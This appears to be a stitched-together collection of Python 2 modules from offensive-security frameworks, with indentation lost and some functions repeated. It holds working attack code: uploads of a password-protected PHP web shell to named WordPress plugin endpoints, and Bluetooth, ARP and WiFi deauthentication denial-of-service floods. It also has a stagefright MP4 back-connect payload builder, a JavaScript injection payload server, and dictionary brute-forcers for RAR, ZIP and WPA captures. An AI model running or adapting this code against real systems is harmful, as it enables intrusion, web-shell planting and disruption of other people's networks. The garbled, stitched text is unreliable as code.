def mlitm():
try:
print ""
print (wcolors.color.YELLOW + "[*]Written by Kyle Osborn")
print ("[*][email protected]")
print ("[*]This is not an exploit tool, it's a payload tool.\n[*]Once you've found the exloit, and you're able to inject javascript,\n[*]just stick this in there as a script.\n[*]<script src='http://YOURIP/'>" + wcolors.color.ENDC)
print (wcolors.color.BLUE + "[*]Stoping Web Server ... "+ wcolors.color.ENDC)
sleep(2)
os.system('xterm -e service apache2 stop')
print (wcolors.color.BLUE + "[*]Web Server Has Been Stoped."+ wcolors.color.ENDC)
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "MLITM" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
if com[0:3] =='run':
os.system('python modules/thebiz.py')
elif com[0:12] =='show options':
print "This Module Not Have Any Options, Insert [run] Command For Execute, Module restarting ..."
sleep(2)
mlitm()
elif com[0:2] =='os':
os.system(com[3:])
mlitm()
elif com[0:4] =='help':
help.help()
mlitm()
elif com[0:4] =='back':
pass
else:
print "Wrong Command => ", com
except(KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
def bluetooth_pod():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Bluetooth_POD" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] == "set interface":
options[0] = com[14:19]
print "interface => ", options[0]
bluetooth_pod()
elif com[0:10] == "set bdaddr":
options[1] = com[11:28]
print "bdaddr => ", options[1]
bluetooth_pod()
elif com[0:8] == "set size":
options[2] = com[9:12]
print "size => ", options[2]
bluetooth_pod()
elif com[0:2] == "os":
os.system(com[3:])
bluetooth_pod()
elif com[0:4] == "help":
help.help()
bluetooth_pod()
elif com[0:4] == "back":
pass
elif com[0:12] == "show options":
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "interface\t" + options[0] + "\t\t\t\tyes\tBluetooth Interface Name"
print "bdaddr\t\t" + options[1] + "\t\t\t\tyes\tTarget Bluetooth Address"
print "size\t\t" + options[2] + "\t\t\t\tyes\tSize of packets (Default 600)"
print ""
bluetooth_pod()
elif com[0:4] == "scan":
os.system("hcitool scan")
print ""
bluetooth_pod()
elif com[0:3] == "run":
print (wcolors.color.BLUE + "[*]Bluetooth Ping Of Death Attack Started ..." + wcolors.color.ENDC)
try:
for i in range(1, 10000):
xterm_1 = "xterm -e l2ping -i %s -s %s -f %s &" % (options[0], options[2], options[1])
os.system(xterm_1)
sleep(3)
except (KeyboardInterrupt, OSError):
print (
wcolors.color.RED
+ "[!] Something Is Wrong ! Websploit Bluetooth_POD Module Exit."
+ wcolors.color.ENDC
)
bluetooth_pod()
else:
print "Wrong Command => ", com
bluetooth_pod()
except (KeyboardInterrupt):
print (wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
def btrar(run):
try:
global defaultarch, defaultdicc
if run != 1:
actions = raw_input(d.prompt("fle/bruterar"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("file", "yes", "file with pass", defaultarch)
d.descrip("dict", "yes", "Dictionary pass", defaultdicc)
print ""
btrar(0)
elif actions[0:8] == "set file":
defaultarch = ping.update(defaultarch, actions, "file")
d.change("file", defaultarch)
elif actions[0:8] == "set dict":
defaultdicc = ping.update(defaultdicc, actions, "dict")
d.change("dict", defaultdicc)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
pass
elif actions == "run" or actions == "r":
d.run()
try:
d.loading_file()
Arch = open(defaultdicc, "r")
if True:
leeArchivo = Arch.readlines()
try:
RARarch = RarFile(defaultarch)
if True:
for palabra in leeArchivo:
palabraLlegada = palabra.split("\n")
try:
RARarch.extractall(
pwd=str(palabraLlegada[0]))
if True:
ping.savetwo("BruteForceRAR",
defaultarch,
palabraLlegada[0])
print "\n-" + Suf + " file Cracked with =", str(
palabraLlegada[0]) + "\n"
return 1
except:
print " " + Alr + " Checking with ", str(
palabraLlegada[0])
except:
Errors.Errors(event=sys.exc_info(), info=defaultarch)
except:
Errors.Errors(event=sys.exc_info(), info=defaultdicc)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info(), info=sys.exc_traceback.tb_lineno)
btrar(0)
def main():
try:
line = mycolor.color.blue + mycolor.color.underl + 'ksf' + mycolor.color.end
line += ' > '
terminal = raw_input(line)
if terminal == 'banner':
header.main_header()
menu.main_info()
main()
elif terminal == 'exit':
exit(0)
elif terminal == 'help':
help.help()
main()
elif terminal[0:2] == 'os':
os.system(terminal[3:])
main()
elif terminal[0:3] == 'use':
if terminal[4:20] == 'web/dir_scan':
dirbb.dirscan()
main()
else:
print("wrong command!using help")
main()
except KeyboardInterrupt:
print("[*]Tring to exit...")
def btzip(run):
try:
global defaultarch,defaultdicc
if run!=1:
actions=raw_input(d.prompt("fle/zip"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("file","yes","file with pass",defaultarch)
d.descrip("dict_1","yes","Dictionary pass",defaultdicc)
print ""
btzip(0)
elif actions[0:8] == "set file":
defaultarch = actions[11:]
d.change("file",defaultarch)
btzip(0)
elif actions[0:10] == "set dict_1":
defaultdicc = actions[11:]
d.change("dict_1",defaultdicc)
btzip(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
pass
elif actions=="run" or actions=="r":
d.run()
try:
d.loading()
Arch = open(defaultdicc,"r")
if True:
leeArchivo = Arch.readlines()
for palabra in leeArchivo:
palabraLlegada = palabra.split("\n")
try:
ZIParch = zipfile.ZipFile(defaultarch)
try:
ZIParch.extractall(pwd=str(palabraLlegada[0]))
if True:
ping.savetwo("BruteForceZIP",defaultarch,palabraLlegada[0])
print "\n-"+Suf+" file Cracked with =",str(palabraLlegada[0])+"\n"
return 1
except:
print " "+Alr+" Checking with ",str(palabraLlegada[0])
except:
d.arcnot(defaultarch)
btzip(0)
except:
d.filenot(defaultdicc)
btzip(0)
else:
d.nocommand()
except:
d.kbi()
exit()
btzip(0)
def ibm():
try:
line_1 = color.RED + "[" + color.CYAN + "XioChi" + color.RED + "]" + color.ENDC
line_1 += color.RED + "[" + color.CYAN + "wordpress/inboundiomarketing" + color.RED + "]>> " + color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:10] == 'set target':
target_ip = com[11:40]
options[0] = target_ip
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[
0]
ibm()
elif com[0:12] == 'show options':
print ""
print wcolors.color.CYAN + "Options\t\t Value\t\t\tRQ\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Target\t\t" + options[
0] + "\tyes\tTarget ip addres"
ibm()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + color.CYAN)
os.system(com[3:])
ibm()
elif com[0:4] == 'help':
help.help()
ibm()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
ibm()
elif com[0:3] == 'run':
log.logger.attack('Wordpress In Boundio Marketing Started!')
exploit = "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
file = open("core/shell/XioChi.php", "rb")
url = options[0]
post = {"file": file}
try:
gg = requests.post(url + exploit, files=post)
cek = requests.get(
url +
"/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/XioChi.php"
)
if cek.status_code == "200":
log.logger.attacksukses("Vulnerable")
log.logger.attacksukses(
"Shell Path : /wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/XioChi.php"
)
log.logger.attacksukses("Password Shell : jancox")
else:
log.logger.error("Not Vulnerable! Exploiting Failed!")
except Exception as e:
print(e)
ibm()
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>>" + com
ibm()
except (KeyboardInterrupt):
print ""
def arplook(run):
try:
while True:
if run != 1:
actions = raw_input(d.prompt("net/arplook"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.noptions()
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
pass
elif actions == "run" or actions == "r":
d.run()
cmd = Popen(["arp", "-a", "-n"], stdout=PIPE, stderr=PIPE)
try:
starting = cmd.stdout.read()
cmd.stdout.close()
except:
error = cmd.stderr.read()
print error
cmd.stdout.close()
print "[+] No network found"
pattern = r"((([01]?[0-9]?[0-9]|2[0-4][0-9]|25[0-5])[ (\[]?(\.|dot)[ )\]]?){3}([01]?[0-9]?[0-9]|2[0-4][0-9]|25[0-5]))"
if True:
try:
cmd = Popen(["arp", "-a", "-n"], stdout=PIPE, stderr=PIPE)
try:
look = cmd.stdout.read()
cmd.stdout.close()
except:
error = cmd.stderr.read()
print error
cmd.stdout.close()
print (" [" + R + "-" + W + "] No network found")
if (str(starting)) == (str(look)):
print " [" + O + "!" + W + "] Good... ", " at: ", datetime.now().strftime(
"%H:%M:%S"
)
else:
print " [" + O + "!" + W + "] ARP Table Changed ", " at: ", datetime.now().strftime(
"%H:%M:%S"
)
print " [" + G + "+" + W + "] Data:\n", look
time.sleep(15)
except:
d.kbi()
arplook(0)
else:
d.nocommand()
except:
d.kbi()
exit()
arplook(0)
def pyc_deco():
try:
line_1 = color.RED + "[" + color.CYAN + "XioChi" + color.RED + "]" + color.ENDC
line_1 += color.RED + "[" + color.CYAN + "reversenginer/pyc_decompiler" + color.RED + "]>> " + color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:9] == 'set input':
input = com[10:40]
options[0] = input
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[
0]
pyc_deco()
if com[0:10] == 'set output':
output = com[11:40]
options[1] = output
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[
1]
pyc_deco()
elif com[0:12] == 'show options':
print ""
print "Options\t\t Value\t\t\tRQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "INPUT\t\t" + options[0] + "\tyes\tSource Encoded"
print "OUTPUT\t\t" + options[1] + "\tyes\tOutput To Decoded"
pyc_deco()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + color.CYAN)
os.system(com[3:])
pyc_deco()
elif com[0:4] == 'help':
help.help()
pyc_deco()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
pyc_deco()
elif com[0:3] == 'run':
log.logger.attack('Reverse Enginer - Pyc Decompiler')
script = options[0]
output = options[1]
try:
from time import sleep
with open(output, "wb") as out:
sleep(3)
log.logger.attack('Decompile Resources...')
uncompyle6.uncompyle_file(script, out)
sleep(2)
log.logger.attack('Proccess Decompile Done...')
pyc_deco()
except Exception as e:
log.logger.error(str(e))
pyc_deco()
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>>" + com
pyc_deco()
except (KeyboardInterrupt):
print ""
def btwpa(run):
try:
global defaultcap,defaultdic,defaultmac
if run!=1:
actions=raw_input(d.prompt("wifi/wpabtf"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("file","yes","file .CAP",defaultcap)
d.descrip("maca","yes","Mac address",defaultmac)
d.descrip("dict_1","yes","Dictionary pass",defaultdic)
print ""
btwpa(0)
elif actions[0:8] == "set file":
defaultcap = actions[9:]
d.change("file",defaultcap)
btwpa(0)
elif actions[0:7] == "set mac":
defaultmac = actions[8:]
d.change("mac",defaultmac)
btwpa(0)
elif actions[0:10] == "set dict_1":
defaultdic = actions[11:]
d.change("dict_1",defaultdic)
btwpa(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
d.loading()
Arch = open(defaultdic,"r")
try:
Arch = open(defaultcap,"r")
if True:
try:
subprocess.call('aircrack-ng -w '+defaultdic+' -b '+defaultmac+' '+defaultcap, shell=True)
except Exception,e:
print " "+Bad+" Error: "+e
except:
d.arcnot(defaultarch)
btwpa(0)
except:
d.filenot(defaultdic)
btwpa(0)
else:
d.nocommand()
except:
d.kbi()
exit()
btwpa(0)
def arplook(run):
try:
while True:
if run!=1:
actions=raw_input(d.prompt("net/arplook"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.noptions()
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
pass
elif actions=="run" or actions=="r":
d.run()
cmd=Popen(['arp', '-a', '-n'], stdout=PIPE, stderr=PIPE)
try:
starting=cmd.stdout.read()
cmd.stdout.close()
except:
error=cmd.stderr.read()
print error
cmd.stdout.close()
print "[+] No network found"
pattern = r"((([01]?[0-9]?[0-9]|2[0-4][0-9]|25[0-5])[ (\[]?(\.|dot)[ )\]]?){3}([01]?[0-9]?[0-9]|2[0-4][0-9]|25[0-5]))"
if True:
print " "+Alr+" Monitoring ARP's tables"
while(True):
try:
cmd=Popen(['arp', '-a', '-n'], stdout=PIPE, stderr=PIPE)
try:
look=cmd.stdout.read()
cmd.stdout.close()
except:
error=cmd.stderr.read()
#print error
cmd.stdout.close()
print(" "+Bad+" No network found")
if(str(starting))==(str(look)):
print " "+Alr+" all right, the ARP/s tables have not changed... ", " at: ", datetime.now().strftime('%H:%M:%S')
else:
print " "+War+" ARP Table Changed ", " at: ", datetime.now().strftime('%H:%M:%S')
print " "+War+" Data: ---------------------------------------------"
print " "+look
print " ----------------------------------------------------------"
time.sleep(14)
except:
Errors.Errors(event=sys.exc_info()[0], info=True)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info(), info=False)
arplook(0)
def dwnm():
try:
line_1 = color.RED + "[" + color.CYAN + "XioChi" + color.RED + "]" + color.ENDC
line_1 += color.RED + "[" + color.CYAN + "wordpress/downloads_manager" + color.RED + "]>> " + color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:10] == 'set target':
target_ip = com[11:40]
options[0] = target_ip
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[
0]
dwnm()
elif com[0:12] == 'show options':
print ""
print wcolors.color.CYAN + "Options\t\t Value\t\t\tRQ\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Target\t\t" + options[
0] + "\tyes\tTarget ip addres"
dwnm()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + color.CYAN)
os.system(com[3:])
dwnm()
elif com[0:4] == 'help':
help.help()
dwnm()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
dwnm()
elif com[0:3] == 'run':
log.logger.attack('Wordpress Download Manager Exploit')
file = open('core/shell/XioChi.php', 'rb')
data = {'upfile': file, 'dm_uplpad': ''}
url = options[0]
try:
gg = requests.post(url, files=data)
cek = requests.get(
url +
"/wp-content/plugins/downloads-manager/upload/XioChi.php")
if cek.status_code == "200":
log.logger.attacksukses("Vulnerable")
log.logger.attacksukses(
"Shell Path : /wp-content/plugins/downloads-manager/upload/XioChi.php"
)
log.logger.attacksukses("Password Shell : jancox")
else:
log.logger.error("Not Vulnerable! Exploiting Failed!")
except Exception as e:
print(e)
dwnm()
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>>" + com
dwnm()
except (KeyboardInterrupt):
print ""
def mp4exploit():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "exploit/stagefright" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:6] == 'set ip':
dork = com[7:40]
options[0] = dork
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Ip Addres" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
0]
mp4exploit()
elif com[0:8] == 'set port':
pages = com[9:40]
options[1] = pages
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Port" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
1]
mp4exploit()
elif com[0:12] == 'show options':
print(wcolors.color.YELLOW + 26 * "#" + wcolors.color.RED +
"[ Options List ]" + wcolors.color.YELLOW + 26 * "#")
print wcolors.color.CYAN + "Options\t\t Value\t\t\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Ip\t\t" + options[
0] + "\tTarget IP Address(your Ip)"
print "Port\t\t" + options[1] + "\t\t\tPort Backconnet(you want)"
print(wcolors.color.YELLOW + 68 * "#" + wcolors.color.ENDC)
mp4exploit()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + wcolors.color.CYAN)
os.system(com[3:])
mp4exploit()
elif com[0:4] == 'help':
help.help()
mp4exploit()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
mp4exploit()
elif com[0:3] == 'run':
log.logger.attack("Starting Creating!!")
subprocess.Popen(
'python metamodules/mp4.py -c %s -p %s -o output/Mp4Exploit.mp4>/dev/null'
% (options[0], options[1]),
shell=True).wait()
sleep(1)
asdas = subprocess.check_output(
'echo [ ${PWD}/output/Mp4Exploit.mp4 ]', shell=True)
log.logger.single("Done", " " + asdas)
print ""
mp4exploit()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>> " + com
mp4exploit()
except (KeyboardInterrupt):
print ""
def webkiller():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "WebKiller" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] == 'set interface':
options[0] = com[14:20]
print "INTERFACE => ", options[0]
webkiller()
elif com[0:10] == 'set target':
options[1] = com[11:]
print "TARGET => ", options[1]
webkiller()
elif com[0:12] == 'show options':
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "Interface\t" + options[
0] + "\t\t\t\tyes\tNetwork Interface Name"
print "TARGET\t\t" + options[1] + "\t\t\tyes\tTarget Web Address"
print ""
webkiller()
elif com[0:2] == 'os':
os.system(com[3:])
webkiller()
elif com[0:4] == 'help':
help.help()
webkiller()
elif com[0:4] == 'back':
pass
elif com[0:3] == 'run':
print(wcolors.color.BLUE + "[*]IP Forwarding ..." +
wcolors.color.ENDC)
subprocess.Popen('echo 1 > /proc/sys/net/ipv4/ip_forward',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
sleep(2)
command_1 = 'tcpkill -i ' + options[0] + ' -9 host ' + options[1]
subprocess.Popen(command_1,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
line_3 = wcolors.color.GREEN + "[*]Attack Has Been Started, For Stop Attack Press [enter] Key..." + wcolors.color.ENDC
press_ak = raw_input(line_3)
os.system('killall tcpkill')
print(wcolors.color.BOLD + wcolors.color.BLUE +
"[*]Attack Has Been Stoped." + wcolors.color.ENDC)
else:
print "Wrong Command => ", com
webkiller()
except (KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" +
wcolors.color.ENDC)
def getdatareport(run):
try:
global defaultred,defaultjav
if run!=1:
actions=raw_input(d.prompt("set/gdreport"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("link","yes","redirectly",defaultred)
d.descrip("java","no","JS for Geo",defaultjav)
d.space()
elif actions[0:8] == "set link":
defaultred=ping.update(defaultred,actions,"link")
d.change("link",defaultred)
elif actions[0:9] == "set javas":
defaultjav = actions[10:]
if defaultjav == "true" or defaultjav == "false":
d.change("javas",defaultjav)
else:
d.nodataallow()
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
elif actions=="run" or actions=="r":
d.run()
try:
print " "+Alr+" Setting files",ping.status_cmd('echo "<?php \$url=\'http://'+defaultred+'\';\$javascript=\''+defaultjav+'\';?>" > '+PATCH_WWW+'/appconfig.php & echo ',"\t\t\t\t")
print " "+Alr+" Coping files to server",ping.status_cmd("cp files/getdatareport/* "+PATCH_WWW,"\t\t\t")
print " "+Alr+" Giving privileges to files",ping.status_cmd("chmod -R 777 "+PATCH_WWW,"\t\t")
if True:
try:
print " "+Alr+" Starting Apache Server",ping.status_cmd("service apache2 start","\t\t\t")
d.go("http://127.0.0.1/redirect.php?id=1337")
raw_input(" "+Hlp+" Press any key for Stop GetDataReport")
print(" "+Alr+" Stoping Process")
print " "+Alr+" Removing files",ping.status_cmd("rm "+PATCH_WWW+"/redirect.php "+PATCH_WWW+"/appconfig.php "+PATCH_WWW+"/jquery.js","\t\t\t\t")
print " "+Alr+" Stoping Apache",ping.status_cmd("service apache2 stop","\t\t\t\t")
except:
print ""
print(" "+Alr+" Stoping Process")
print " "+Alr+" Removing files",ping.status_cmd("rm "+PATCH_WWW+"/redirect.php "+PATCH_WWW+"appconfig.php "+PATCH_WWW+"/jquery.js","\t\t\t\t")
print " "+Alr+" Stoping Apache",ping.status_cmd("service apache2 stop","\t\t\t\t")
print ""
getdatareport(0)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
getdatareport(0)
def arp_dos():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "ARP DOS" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] =='set interface':
interface_name = com[14:25]
options[2] = interface_name
print "Interface => " + options[2]
arp_dos()
elif com[0:10] =='set target':
target_ip = com[11:27]
options[1] = target_ip
print "TARGET => " + options[1]
arp_dos()
elif com[0:10] =='set router':
router_ip = com[11:27]
options[0] = router_ip
print "ROUTER => " + options[0]
arp_dos()
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t RQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "Interface\t"+options[2]+"\t\t\tyes\tNetwork Interface Name"
print "TARGET\t\t"+options[1]+"\t\tyes\tTarget IP Address"
print "ROUTER\t\t"+options[0]+"\t\tyes\tRouter IP Address"
print ""
arp_dos()
elif com[0:2] =='os':
os.system(com[3:])
arp_dos()
elif com[0:4] =='help':
help.help()
arp_dos()
elif com[0:4] =='back':
pass
elif com[0:3] =='run':
print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]Attack Has Been Started ..." + wcolors.color.ENDC)
command = 'xterm -e ettercap -i '+ options[2] + ' -Tq -P rand_flood ' + '/'+options[0]+'/' + ' ' + '/'+options[1]+'/'+ ' &'
os.system(command)
line_4 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_4 += ":"
line_4 += wcolors.color.UNDERL + wcolors.color.BLUE + "ARP DOS" + wcolors.color.ENDC
line_4 += " > For Stop The ARP DOS Attack Press [Enter] : "
fin = raw_input(line_4)
os.system('killall ettercap')
print(wcolors.color.BOLD + wcolors.color.GREEN + "[*]Attack Stoped." + wcolors.color.ENDC)
else:
print "Wrong Command =>" + com
arp_dos()
except(KeyboardInterrupt):
print ""
def ddos(run):
global defaultcar,defaultint,defaultmac,defaultcha,defaultess
try:
if run!=1:
actions=raw_input(d.prompt("wifi/dos"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("intf","yes","Interface card",defaultcar)
d.descrip("intm","yes","Int... monitor",defaultint)
d.descrip("bssid","yes","Mac address",defaultmac)
d.descrip("essid","yes","Name of AP",defaultess)
d.descrip("chan","yes","Channel red",defaultcha)
d.helpAUX()
ping.interfaces(1)
ping.monitor()
d.space()
elif actions[0:8] == "set intf":
defaultcar=ping.update(defaultcar,actions,"intf")
d.change("intf",defaultcar)
elif actions[0:8] == "set intm":
defaultint=ping.update(defaultint,actions,"intm")
d.change("intm",defaultint)
elif actions[0:9] == "set bssid":
defaultmac=ping.update(defaultmac,actions,"bssid")
d.change("bssid",defaultmac)
elif actions[0:9] == "set essid":
defaultess=ping.update(defaultess,actions,"essid")
d.change("essid",defaultess)
elif actions[0:8] == "set chan":
defaultcha=ping.update(defaultcha,actions,"chan")
d.change("chan",defaultcha)
elif actions[0:5] == "start":
start = actions[6:]
print " "+Alr+" Starting Monitor Mode In "+start,ping.status_cmd("airmon-ng start "+start,"\t\t\t")
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
elif actions=="run" or actions=="r":
d.run()
try:
print " "+Alr+" Starting attack..."
subprocess.call('aireplay-ng --deauth 1000 -a '+defaultmac+' '+defaultint, shell=True)
except(KeyboardInterrupt, SystemExit):
print("\n "+Alr+" Stopped DDOS")
else:
d.nocommand()
except:
d.kbi()
exit()
ddos(0)
def shell():
while True:
try:
p = pr.prompt()
if p == "exit":
load.exit()
print()
sys.exit()
elif p == "help":
help()
elif p == "clear":
os.system("clear")
elif p == "about":
about()
elif p == "show":
show()
s = p.split(" ")
if s[0] == "use":
try:
if s[1] == "localip":
log.info("Your IP: " + localip())
elif s[1] == "publicip":
if publicip():
log.info("Your IP: " + publicip())
else:
log.error("No Connection")
sys.exit()
elif s[1] == "getproxy":
if getproxy():
j = json.loads(getproxy())
print("[PROXY]> " + j["result"]["ip"] + ":" +
str(j["result"]["port"]))
else:
log.error("No Connection")
sys.exit()
elif s[1] == "user-agent":
try:
if getua(str(s[2])):
j = json.loads(getua(str(s[2])))
if j["status"] == "success":
print("[USER-AGENT]> {}".format(
j["result"]["ua"]))
else:
log.error(j["pesan"])
else:
log.error("No Connection")
sys.exit()
except IndexError:
print("Usage: use [options] [browser]")
except IndexError:
print("Usage: use [options]")
except (EOFError, KeyboardInterrupt):
print()
log.error("please input 'exit' to exit tool")
continue
def btzip(run):
try:
global defaultarch,defaultdicc
if run!=1:
actions=raw_input(d.prompt("fle/zip"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("file","yes","file with pass",defaultarch)
d.descrip("dict","yes","Dictionary pass",defaultdicc)
print ""
btzip(0)
elif actions[0:8] == "set file":
defaultarch=ping.update(defaultarch,actions,"file")
d.change("file",defaultarch)
elif actions[0:8] == "set dict":
defaultdicc=ping.update(defaultdicc,actions,"dict")
d.change("dict",defaultdicc)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
pass
elif actions=="run" or actions=="r":
d.run()
try:
d.loading_file()
Arch = open(defaultdicc,"r")
if True:
leeArchivo = Arch.readlines()
try:
ZIParch = zipfile.ZipFile(defaultarch)
if True:
for palabra in leeArchivo:
palabraLlegada = palabra.split("\n")
try:
ZIParch.extractall(pwd=str(palabraLlegada[0]))
if True:
ping.savetwo("BruteForceZIP",defaultarch,palabraLlegada[0])
print "\n-"+Suf+" file Cracked with =",str(palabraLlegada[0])+"\n"
return 1
except:
print " "+Alr+" Checking with ",str(palabraLlegada[0])
except:
Errors.Errors(event=sys.exc_info(), info=defaultarch)
except:
Errors.Errors(event=sys.exc_info(), info=defaultdicc)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info(), info=False)
btzip(0)
def wmap():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Wmap" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:10] == 'set target':
options[0] = com[11:26]
print "TARGET => ", options[0]
wmap()
elif com[0:12] == 'show options':
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "TARGET\t\t" + options[0] + "\t\t\tyes\tTarget IP Address"
print ""
wmap()
elif com[0:2] == 'os':
os.system(com[3:])
wmap()
elif com[0:4] == 'help':
help.help()
wmap()
elif com[0:4] == 'back':
pass
elif com[0:3] == 'run':
print(wcolors.color.YELLOW + "[*]Engine Has Been Started." +
wcolors.color.ENDC)
sleep(2)
os.chdir('//tmp')
check_tmp = os.listdir(os.curdir)
if 'websploit_wmap.rc' in check_tmp:
os.system('rm -rf websploit_wmap.rc')
myfile = open('websploit_wmap.rc', 'w')
myfile.write('workspace -d websploit-wmap\n')
myfile.write('workspace -a websploit-wmap\n')
myfile.write('load wmap\n')
myfile.write('sleep 3\n')
myfile.write('wmap_targets -c\n')
myfile.write('wmap_sites -a ' + options[0] + '\n')
myfile.write('wmap_targets -t ' + options[0] + '\n')
myfile.write('wmap_run -t\n')
myfile.write('sleep 3\n')
myfile.write('wmap_run -e\n')
myfile.write('exit -y\n')
myfile.close()
os.system('msfconsole -r websploit_wmap.rc')
else:
print "Wrong Command => ", com
wmap()
except (KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" +
wcolors.color.ENDC)
def exiftool(run):
try:
global defaultimg
if run != 1:
actions = raw_input(d.prompt("for/imagen"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("imagen", "yes", "img for forence", defaultimg)
print ""
elif actions[0:10] == "set imagen":
defaultimg = ping.update(defaultimg, actions, "imagen")
